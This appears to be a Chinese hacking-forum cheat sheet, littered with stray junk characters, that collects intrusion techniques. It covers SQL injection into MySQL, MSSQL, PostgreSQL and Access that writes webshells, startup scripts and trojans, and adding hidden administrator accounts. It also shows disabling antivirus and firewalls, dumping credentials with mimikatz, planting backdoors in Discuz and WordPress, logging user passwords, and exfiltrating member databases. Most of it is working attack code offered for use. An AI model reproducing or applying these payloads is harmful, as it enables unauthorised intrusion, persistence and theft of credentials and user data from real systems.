* A' O  t% w( @& }: Q* Vcreate table a (cmd text);
9 w$ p! r! D8 finsert into a values ("set wshshell=createobject (""wscript.shell"") " );
. U6 J% a8 Q/ y0 w7 L9 winsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );3 D4 Y, N$ B/ [; {/ }, s
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
: w" L$ v7 q3 ]* S* F1 H* o+ t( |select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
9 u0 M" d! P% \! adrop table a;
/ W0 Y$ Y2 X" c6 O5 i; N1 O
1 j$ J$ p& b6 o1 Y* B9 Z- K英文版本:6 W+ F% [+ u+ c: T( F5 B

1 w' N; a' x  M! a. a* S( L) ?use test;
  Z! `- E; h5 g/ ~, j! k  }6 {/ q1 Pcreate table a (cmd text);7 g% G' s& [) C
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
  V% w1 e8 {- o) Y! [: oinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );: h3 L0 ?7 S, f- A. F
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
  G2 [+ P3 C$ U* {6 v) Jselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
' @! y; i4 k  g3 k3 z* c8 e0 G( Z# zdrop table a;
) N1 t% j) d# E/ I$ H5 @  B' m! l
create table a (cmd BLOB);
. |* C8 F+ R2 d# s) Oinsert into a values (CONVERT(木马的16进制代码,CHAR));7 f$ G6 ]2 \/ i% x' k5 [
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'5 d0 f; W- v( F! {# p
drop table a;
' H* }; s: Y3 R$ H: A- M. K3 v) ?* r( A, W, g, O4 ^
记录一下怎么处理变态诺顿
3 g" H" m0 u( F查看诺顿服务的路径
9 F5 X) v. \  O: n2 Z9 @9 `sc qc ccSetMgr+ C8 T1 {$ g9 V/ |2 T* g
然后设置权限拒绝访问。做绝一点。。
  ]0 x  ^3 f, w# g7 ^. L+ }  Ucacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
$ N# g9 |! D! m2 o  m' Y6 H4 Zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"# a, R2 n' V2 P2 a" x4 G5 z  l
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
7 X, k' ~5 O  d* t, M- |! t% O3 Hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
& ^9 o3 f4 ]/ e
  u- J/ V2 }* f然后再重启服务器
7 C% ^% i% D; Diisreset /reboot
8 G& O, V7 p% v! n这样就搞定了。。不过完事后。记得恢复权限。。。。
- ^6 q: \( ~9 Gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F5 F6 a# V6 u9 C
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F5 M0 L$ t4 n- f6 k" s/ X
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
1 X! B5 {/ k0 Q) T/ o/ Mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F/ h& ]$ l0 s/ \' S; j% ], B! F
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin2 Y: B' h% U0 ?$ H' I% P2 l

6 S+ D" d( x/ a6 F: aEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user'''); |7 s& F* N; r9 j# K

0 U1 Q9 V& h6 |: z9 k9 qpostgresql注射的一些东西1 a! o2 v) G* T- F# o" [
如何获得webshell
- _$ A+ \/ }( Vhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); & u$ F8 M8 |" @; y: v8 l
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
. a7 O1 E1 P) D, lhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;9 ?+ y+ Q5 f: `* e/ \1 k/ ?
如何读文件
( x/ h" P0 ~2 _5 a7 L7 x- Hhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
8 \! ^7 g( Y6 x2 B. f1 o  P0 s" ]http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;& @# E. l: ~( l) u. b! J' W$ q" Q
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
5 e/ R, ~9 ]8 ^9 L5 L  m9 V* l. T
+ _: e$ w) {* `& tz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。- |1 Z( |5 n- |" J) m
当然,这些的postgresql的数据库版本必须大于8.X
7 B. h6 B9 @; u2 D/ n  t. {% j# s1 C4 X创建一个system的函数:; \+ S( p$ b0 @' e
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT% Z# @' P  U- [; z( z& U

0 l; A( A2 S0 A4 `" C$ H创建一个输出表:
" T" Y, E! {! r" ]CREATE TABLE stdout(id serial, system_out text)- _0 I$ g0 D: z8 F/ X+ x
6 T' I; w/ E: S" x/ ]2 F  F
执行shell,输出到输出表内:
  V8 {/ ~9 I, n$ Z' A! FSELECT system('uname -a > /tmp/test')
% H9 G: Y! G6 x( g! I0 z2 i1 S& _& N. X6 }/ m6 J- ~( j* b
copy 输出的内容到表里面;
2 M; l+ ~) e: b6 o# vCOPY stdout(system_out) FROM '/tmp/test'
+ f3 l4 b" M! R: [6 T2 o6 y: v' z) C  G4 m! ^
从输出表内读取执行后的回显,判断是否执行成功" Z2 A; @# O: A7 A* J
3 a0 g: X( g/ D6 u
SELECT system_out FROM stdout
! O; c# Z# A4 w, P0 D6 F; L# o下面是测试例子
3 A; p! _+ C# @
: \/ K! n3 v: T( u6 v( J: x/ [/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
+ V7 ~9 b0 W0 U$ D  Z( B# S2 [, T2 Z: i/ ]
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
3 q1 E% O7 [; n8 zSTRICT --
6 @5 t# `+ q, {5 o& F
6 W  S7 D' N6 l0 M. d/store.php?id=1; SELECT system('uname -a > /tmp/test') --
$ F$ R5 I0 [+ F, X0 r" t! ^$ A4 R! Q0 V3 z& d- }" }0 e7 |2 P4 v
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
% }6 S+ A( T  R+ n* g. E( D8 ^1 A: _3 Z) T+ Y% f3 t8 W# ^2 t
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--0 p1 a6 Y! |* B4 @8 @
net stop sharedaccess    stop the default firewall' k' I9 V$ t9 {; H0 q
netsh firewall show      show/config default firewall
8 e- A' p" @$ c1 R+ k5 hnetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
( P% x9 a$ x' G. l, @' Y  a6 Z$ N) Mnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall' [& j* P5 Y. @7 ?5 B) k0 C
修改3389端口方法(修改后不易被扫出)0 J* i7 n4 v/ k: K
修改服务器端的端口设置,注册表有2个地方需要修改
4 r8 s9 @9 X* I$ O$ M& ~4 R% G; P# {1 E
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]& Q' y; }' ?; v4 \- V: K4 d2 `
PortNumber值,默认是3389,修改成所希望的端口,比如6000
  X2 N7 D0 `- Z: I) G9 f1 D/ z. \" a: R; r; d
第二个地方:( k8 I" Y' u& V: N6 N
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 2 `. }4 d& Q' O
PortNumber值,默认是3389,修改成所希望的端口,比如6000
8 s( `* C/ Y' [. g/ Q$ o8 c1 R' z
8 n+ O2 N2 `7 L现在这样就可以了。重启系统就可以了, v/ A3 s0 i$ A" R
( {' |& k! Y+ x: ]2 \
查看3389远程登录的脚本1 L. C3 }% l# h# Z8 B+ }
保存为一个bat文件
% O# {6 k) j* Ldate /t >>D:\sec\TSlog\ts.log3 g+ D$ _/ _" ?5 w& W
time /t >>D:\sec\TSlog\ts.log
7 C0 c3 P/ J( `, l3 U' M$ enetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
  j' ~% a3 j# N) Mstart Explorer
) }2 c/ }' }- L; L0 I) o+ E: j6 R. w3 [7 H3 s
mstsc的参数:
9 s: ~5 b# i$ t! J0 k/ O% K& c  ~: v6 H6 D
远程桌面连接
4 F5 ~; D0 F# u# f9 Z
0 X1 d" ?$ R* k1 zMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]! a, o3 s& w% F7 S% Z% h
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
4 E" z: ~. B$ N1 w. e& y
4 p: ?) E9 v. N4 r3 U5 V<Connection File> -- 指定连接的 .rdp 文件的名称。# F9 K- Y4 v+ M* S$ n5 V# j5 N
! ~+ [+ L, A8 u* B
/v:<server[:port]> -- 指定要连接到的终端服务器。1 g5 U; ?$ C4 R  |
& O0 K0 j$ w+ \
/console -- 连接到服务器的控制台会话。
' `+ s+ r7 q/ I/ s; p7 w3 D$ ?* r3 ^( T9 T- A- U! Z# \
/f -- 以全屏模式启动客户端。
: @3 L: N1 }! c6 m) t5 ]$ O6 E# \3 y& ^& K- k+ E- {: {
/w:<width> --  指定远程桌面屏幕的宽度。  {$ Z+ f5 u3 `! n; o5 j/ g7 ]
* R% ?) b5 w- K4 Y; H" a
/h:<height> -- 指定远程桌面屏幕的高度。; \. Z8 M2 @5 l+ [( ~. ]
. s; T( c/ x# a: p7 n# G
/edit -- 打开指定的 .rdp 文件来编辑。! x: Y; w. _0 ?- i4 y
" r* y! _  p9 u0 o
/migrate -- 将客户端连接管理器创建的旧版
3 ~' A' Y7 B& m连接文件迁移到新的 .rdp 连接文件。
8 `) i! r0 U) \( K5 Q" h& t2 H0 p' @9 d% n; |, f5 r+ f

8 Z7 R* p- Q6 C! F其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就7 l( n7 A, b' u
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
" ^, Q5 ~. r1 ?& L, m) s: A- x& L7 Z
命令行下开启3389: A8 ^$ V9 e' V# U5 u! d6 Z
net user asp.net aspnet /add' N; p7 `/ v0 V' B- e
net localgroup Administrators asp.net /add8 M3 M/ |8 t* }& E5 |* l
net localgroup "Remote Desktop Users" asp.net /add
% D. u- y: N3 iattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
2 v* w# i( w; q: Z! ?( n( Z% Becho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0& L6 g) A6 X0 j% m: i' k! j
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
! u% w3 |8 ~2 n5 b8 i. S1 j! hecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
$ P2 J" T7 G: W4 p9 r) R0 Zsc config rasman start= auto4 q2 `% H. K* i" Y0 @
sc config remoteaccess start= auto
  E7 B1 e. h8 l* q. Z3 x  m" y8 q# b' inet start rasman" F( h7 c+ _. ]% o( R  j
net start remoteaccess
. r& W4 Y5 ^7 E! j8 h" JMedia. v7 P& z0 R0 K& J* {; P& d4 m
<form id="frmUpload" enctype="multipart/form-data"+ j# m" u  [  V
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>+ G( c2 V0 H4 D7 l
<input type="file" name="NewFile" size="50"><br>
! K) S8 z8 r! D, |<input id="btnUpload" type="submit" value="Upload">
/ o) U: a) G6 X- v</form>1 e( ~' \5 t  m* ?
7 w" |$ w8 p$ ]& ^8 _6 B
control userpasswords2 查看用户的密码% Q. [( ^8 X$ F) F9 l9 r% v
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径8 o/ ^3 p# @  ?9 \: Z1 `1 ~2 l
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a$ W) R8 L( n  {. ~8 a: v% `2 c) H6 ^
$ b8 Y2 z* J0 V; P
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:% J1 O. p% L+ M* l
测试1:$ l. F$ ]/ p, n* l
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1) Y6 z% o$ m3 N4 |1 H

! i2 p9 h3 K2 z测试2:
' }) b5 W0 x3 u$ z; K% z) _& h0 o4 h, c8 Y3 D% s. g: J( s1 A
create table dirs(paths varchar(100),paths1 varchar(100), id int)8 v$ ]1 a' B" Y- X* G9 i

8 j: C+ K- W8 o, x) r2 [delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--' r: }# F# H9 x  ]/ ^( t: e& F
( K$ ?4 x4 T; a: h1 C
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
6 g  F: k+ u& x( K8 D3 Y$ ]关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
- X) m8 D6 g9 L& g1 t+ p4 F. o可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;9 F$ h5 |2 L) ~+ F5 A, {
net stop mcafeeframework7 R; w) Y) u% B% Y- o1 [
net stop mcshield
' ]( H$ s2 W' `1 N, b; v3 Hnet stop mcafeeengineservice
- Q9 ?/ u, a# e; }( `net stop mctaskmanager  N1 f! B/ |/ q
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
' l' ?7 M+ s2 x3 C9 j5 `  _' M( a
' J' I  V+ c5 c7 V  VNCDump.zip (4.76 KB, 下载次数: 1)
: @& K/ |% @! H; t密码在线破解http://tools88.com/safe/vnc.php
' w0 ?$ P# y) f( z) \7 Y; tVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取( F' G* ]4 e* E& q! X0 J& r

: D$ _; A/ X; P- d9 mexec master..xp_cmdshell 'net user'
6 o, K$ r3 ~0 i+ n; h$ W' Pmssql执行命令。; k: O+ f/ U% O- Y
获取mssql的密码hash查询0 J5 Q7 K% u& _8 L8 f3 d
select name,password from master.dbo.sysxlogins
+ H' F4 Q7 `5 N8 w7 k- j4 V6 _- C. t" T  e) o) `
backup log dbName with NO_LOG;. t7 B9 S$ P: A# y
backup log dbName with TRUNCATE_ONLY;
' n$ G' d. t  [4 F) hDBCC SHRINKDATABASE(dbName);
# ?& Q, L, @5 e  K7 cmssql数据库压缩0 k! o' D  `2 E# F4 N: N
% [( @( x, C* x- a/ z
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK. }% m6 b4 _5 L
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
, V: }3 P6 F% H2 Y6 {5 [# o4 i5 m( G8 s* G5 q  H
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'# Z( ~& k0 b0 d* h
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
4 F% P% p( a' F3 b/ [6 k+ }! ?% ]" r8 A$ A
Discuz!nt35渗透要点:
2 d# b3 k5 k# p+ N! z(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default' `  q2 y3 i" G9 J( w0 Z
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>% }! U9 r6 G" k; Q2 ~, {' k$ n
(3)保存。5 I+ u6 |6 O& j3 F9 @
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
7 u* a8 r# ~, W$ K$ \0 T7 b. ^4 }4 gd:\rar.exe a -r d:\1.rar d:\website\) |0 \# h- B  o/ q; K/ U9 w
递归压缩website
' _5 w6 B& p5 {注意rar.exe的路径9 E/ i# l3 I" ^

4 X. K9 O$ }2 h3 w* f<?php
: k  Z' Q1 z" N. ]8 f) w+ E3 }, _2 h/ w# F9 _
$telok   = "0${@eval($_POST[xxoo])}";
: ~3 q. C! x8 L9 B5 w: c. S
' }5 m* d$ ~, }, j( X: o2 r+ b$username   = "123456";1 t7 [5 ~4 N- Y" p- n: ?9 S- h

9 \$ [% D# h$ ^/ o  o, v$userpwd   = "123456";
* I1 p% n$ f' A1 ?- s
8 [" `+ ^3 ]8 ?9 f# i# M  C% i$telhao   = "123456";$ i, o; a& h. e' s- o8 M

0 U6 z& h( O1 r1 _( z' T) f6 q( l0 n$telinfo   = "123456";
9 b  u# l  Y% y4 q7 T$ X: O- q; g" `' G. t6 L
?>
0 {% c- Y2 G) @+ u- f: mphp一句话未过滤插入一句话木马
1 B! K! Y6 i" a% P& z3 r6 `
. b8 S) F6 i" o: W4 g3 @' _站库分离脱裤技巧
5 \; q7 W* V: W9 C8 bexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
& m6 j* Y% l: r5 w) Vexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
& j9 q6 k1 w5 {/ e5 t条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
8 g- r& w8 d& y- a这儿利用的是马儿的专家模式(自己写代码)。
! B2 t8 h& |+ S6 V% kini_set('display_errors', 1);
/ s1 q/ G3 J0 n: `# q) _set_time_limit(0);9 N) b6 H/ b. y# A* u9 m
error_reporting(E_ALL);" h( [0 z8 k: _$ ^2 b5 K$ ~/ T' Q$ {
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());6 \$ U: i8 X2 L3 U4 J1 @4 X
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());# S2 L3 {2 f3 g0 p
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());$ M4 ~+ m0 k3 i3 x
$i = 0;
6 L1 t6 ]- B" K! ~" l/ p1 O4 q$tmp = '';6 L/ S+ [9 l8 g( g/ u: l
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
: h+ c/ H9 P1 K7 t( d9 }    $i = $i+1;, @4 g: ^/ @3 Y8 W
    $tmp .=  implode("::", $row)."\n";: k1 C) W) p' t( |$ ]6 T
    if(!($i%500)){//500条写入一个文件
% x$ C7 }3 {- M) s        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
- c1 k% Y) R# B+ r9 v( X* O: e2 L        file_put_contents($filename,$tmp);
) R( t# o( b: k! Q2 Q) s/ |; Q: T        $tmp = '';; h  M! Y9 f( ^% I+ p8 A: h+ I: E$ S
    }6 t' ~/ {; R% Q% n/ f
}
! e/ v; l  K0 t! F5 r7 ^mysql_free_result($result);
$ }" o; t; H; N7 ]4 O1 P: T' B8 k6 P! r7 @
2 |3 u# v& Q7 A9 B& ]* m) l
  @$ b/ D$ L9 j
//down完后delete
8 {5 [* Q6 h2 J$ g; Q/ o7 n! \6 w: b; W) O9 ^
0 g! W( n$ Z) O9 S6 P
ini_set('display_errors', 1);
7 Q. |  x9 v! W* w  |error_reporting(E_ALL);* P% |0 D0 c2 @& Y' h& I
$i = 0;8 C5 f& j+ [( L" l( O0 A/ L
while($i<32) {$ a+ R% T  a0 d% u$ `& O1 B
    $i = $i+1;
9 J: p- h7 @: E- t+ |/ l( e        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';1 }  V. r3 y& |3 y$ f
        unlink($filename);
1 m* K* {/ u1 l/ K( \& i/ M}
" F& W+ Q' ~. M4 ]" y6 N; Phttprint 收集操作系统指纹, p& z7 f9 K! K2 w$ a  S7 X: Y; N- a
扫描192.168.1.100的所有端口. c$ V4 ^2 E! _8 ~* L0 ]
nmap –PN –sT –sV –p0-65535 192.168.1.100
, F) a3 ]! L( N1 zhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
: i+ ]- A+ p, M- y1 @8 [& _host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输- Q. D' R  C8 l0 {# p0 y3 k3 L' s
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
# Z5 ~2 m$ x9 P* x6 U9 r) V- K( L8 J" E9 F; o
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
7 B9 i1 _+ ~  a3 }$ O; `
. A; z  D# k: B# p- d/ N  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)2 ~+ K( c2 k: V' [5 M. d
2 d0 q! B3 _/ j, M/ Y
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x( r4 |9 W- K) w) h

9 `) t0 Y$ A$ y# V3 Q# t: V5 I( S! d  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
- L9 n. N/ l; j! @" S! s: T6 E$ M( [
  http://net-square.com/msnpawn/index.shtml (要求安装)
' m# W; t4 p/ P4 z) r; U9 _" W+ m7 p+ e1 e3 A2 u6 r9 E7 Z
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)$ k3 q8 a: L0 r8 V1 U6 ]! F9 H) M

$ z& Y% M% r9 Z" u! @9 K: f6 b% G  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)' L4 G8 y2 R! s) h
set names gb2312
0 I" j5 k( _. s( N" C( K导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
' A6 C& y# _2 s6 I- C2 j# P
8 }, l4 _! `* ~mysql 密码修改
0 R. J' O6 A3 t9 x# `2 RUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
/ V  w3 i# R5 ?5 G! uupdate user set password=PASSWORD('antian365.com') where user='root';* H& y  D7 b- [- m  J
flush privileges;" I3 [: G: R- z) r( J
高级的PHP一句话木马后门
$ u* w" {  h0 \6 Q$ b' k% h& K" I( O2 Q
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀& \4 }% K6 j8 N9 c
* Z0 |. @' M, `+ i- l* f
1、- Z' V) r4 q# y: E4 h
7 x, @: b. T' ~( F3 W5 s
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";9 n. U. I) Y3 x. z3 L% {
& I! n: s8 {4 @$ I
$hh("/[discuz]/e",$_POST['h'],"Access");+ e5 Y9 c) g; e

0 c% }- u$ w! r% a2 }//菜刀一句话/ }* r) H' g0 D  Y: T% U# j! V

! X5 g4 I& a" @% t  w/ E2、
! X+ r2 |4 _) L- F1 U- Q* h# u( U% C: g: p6 x, G/ n
$filename=$_GET['xbid'];
: f0 A) }' U: E9 u/ N# h" S
& l& [# X9 N, k3 C" v! ^) Pinclude ($filename);
( I$ b1 n- ?9 q  N* G+ y9 I" R3 J) K: I6 i+ U1 m
//危险的include函数,直接编译任何文件为php格式运行' a- @; O. h3 {7 j- A: i* O

* n8 L6 e* D. a' I: v3、
8 n6 H/ [, j: x0 }: s1 b& [( w
* r6 D9 w2 `2 U0 f$reg="c"."o"."p"."y";
9 U. Z' @0 s' _- q' O* ?0 V6 G* d; n7 o6 d( _  ]! {: K
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
8 ~- J6 c, w8 ~; p( K7 q! r! ^. _7 k  }1 `
//重命名任何文件
/ c$ [& F0 B' @# G8 F$ C3 \
; ~2 g4 u. N, m  Z4 a. q3 ~* l' s4、; R) Q2 e# z4 U$ X5 s
8 L% P5 K  g' J( n4 q/ `1 e
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";& N% I9 O! T% F# m6 e: h+ e
4 v7 f9 d7 ?+ D% p6 m0 t
$gzid("/[discuz]/e",$_POST['h'],"Access");
; O5 S$ ^9 |7 w9 _% X/ K
2 H  a$ K9 @3 Q, c: V; o2 X//菜刀一句话$ p, U+ ]  J" Z9 E; H! ]

7 z4 x$ z( J# C( {( o# M: Z4 e- D0 A5、include ($uid);0 ?! g4 S' R1 Q* i( H5 [
6 o! _5 z. t5 [3 y' Z- k7 G& F
//危险的include函数,直接编译任何文件为php格式运行,POST
9 D/ A6 j: j/ W% @; G; J( [0 m+ Q: g! T% @( R4 r" S9 [
% A4 r  \: W" z; M( ?* h
//gif插一句话
* y( i% e+ H, M6 O1 M/ x0 R
+ L4 @# U7 }& T8 F6、典型一句话
' J% o2 C7 e; \$ X3 F- l* H& N3 l
8 P" O" A  a$ n: @' W7 n程序后门代码
) W! A  J3 h3 K<?php eval_r($_POST[sb])?>. l- I2 g( X) c) u9 n
程序代码
; ^. b2 z  T3 f$ c9 a3 l  @<?php @eval_r($_POST[sb])?>* ?. t4 t$ _9 U  Y% Q8 ^- V
//容错代码( o( E) d1 ^' `: Q; U5 k- Z
程序代码/ _1 y" e' l2 N3 `* j
<?php assert($_POST[sb]);?>
' a9 h9 s5 ^% l//使用lanker一句话客户端的专家模式执行相关的php语句
8 U1 h% O: W% \4 q程序代码; Z7 t( @; A8 `0 d  M. y2 y( T
<?$_POST['sa']($_POST['sb']);?>& S. B& y8 y% N% w8 x  @0 q
程序代码9 P3 z$ z, d  ]; c/ o  f
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
) i* K8 K& \! M5 V+ x4 N$ h" U$ U  A9 g程序代码
% O; n5 h& d# ~4 q- I8 g<?php6 i7 S; W/ |- V9 T3 r. O- g
@preg_replace("/[email]/e",$_POST['h'],"error");
- z; K4 ?5 w5 U" f7 V9 r! R+ z?>
& H, t7 c' I% A, O, K//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
! |7 f1 B6 ]: H0 ^8 \8 f8 P/ Y程序代码
% H+ ]" W" G" Y. Q" ~<O>h=@eval_r($_POST[c]);</O>
# C6 Y( d8 H0 N. U+ J( r程序代码
( n* t( v. M. P$ K+ D% B( B8 o<script language="php">@eval_r($_POST[sb])</script>5 K- R" P' P! Q4 C* u
//绕过<?限制的一句话
# d2 G  p5 M! [6 y( ?- C7 Z
# Q* d6 V' j& h" p5 Q9 shttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip) y: p6 L1 w6 D3 q# J
详细用法:- ~1 l+ g, F1 \- `0 _; J
1、到tools目录。psexec \\127.0.0.1 cmd) `, s% H! }% i8 o9 L- N5 X3 X
2、执行mimikatz' z: {6 U" R9 i% ]  ^% S
3、执行 privilege::debug
$ X: g9 B# l6 Z! z4、执行 inject::process lsass.exe sekurlsa.dll
( q" y/ q2 m# \7 C  q5、执行@getLogonPasswords
; {4 e4 E4 S! p1 m3 e! A2 [6 j+ s6、widget就是密码
" b, [3 O3 v0 \. x2 s( O7 V7、exit退出,不要直接关闭否则系统会崩溃。/ ^# K$ w3 d( P, f

# v; y5 K8 ?4 e% w* X1 Ahttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
$ J8 Y! Y# n, p  b) m5 ?1 {: r& \
自动查找系统高危补丁
3 n) ~, L5 |) S' Nsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
8 r" a  g+ l! G% _/ M. K( Y3 J( u# P7 v8 q2 B; s' j
突破安全狗的一句话aspx后门# p9 h) Y* \, Y  h
<%@ Page Language="C#" ValidateRequest="false" %>( {  c& k2 m: _* t3 C
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>. ^, E/ Y* C8 p" t8 W/ @& k) j( i
webshell下记录WordPress登陆密码
2 @' ?3 A) R) O: Xwebshell下记录Wordpress登陆密码方便进一步社工; G% `0 a4 z" |1 c) ^. j  _
在文件wp-login.php中539行处添加:0 Q) Z4 q3 H: W/ z' d* l
// log password
3 h+ ?; J( C" r# C- h8 ^; @4 ]$log_user=$_POST['log'];" g2 n) y6 |: W$ |8 W* P0 T
$log_pwd=$_POST['pwd'];5 z& H& ^& U. b' w$ S) G- r
$log_ip=$_SERVER["REMOTE_ADDR"];( T& Y, S- F( A2 \7 |
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
9 J* F; c# e, R8 q- C; N% k( x4 A4 W9 Q2 `9 J$txt=$txt.”\r\n”;
  W: ?) ]/ q, F/ Pif($log_user&&$log_pwd&&$log_ip){
" {) L1 x8 h( U$ V/ N" w) Q( ?) ?@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
